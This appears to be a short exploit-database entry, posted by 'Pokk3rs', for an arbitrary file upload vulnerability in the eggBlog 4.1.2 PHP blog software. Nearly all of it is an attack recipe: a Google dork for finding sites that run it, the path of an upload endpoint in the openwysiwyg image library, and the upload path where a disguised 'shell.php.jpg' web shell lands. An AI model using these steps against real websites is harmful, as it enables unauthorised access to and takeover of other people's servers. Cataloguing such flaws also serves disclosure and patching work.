eggBlog 4.1.2 - Arbitrary File Upload Vulnerability

2013-05-01T00:00:00
ID 1337DAY-ID-20718
Type zdt
Reporter Pokk3rs
Modified 2013-05-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Expl0itation
 
 
1 - Google Dork:"powered by eggBlog.net"
 
 
2 - http://server/[path]/_lib/openwysiwyg/addons/imagelibrary/insert_image.php?wysiwyg=
 
 
3 - http://server/[path]/photos/uploads/shell.php.jpg

#  0day.today [2018-03-19]  #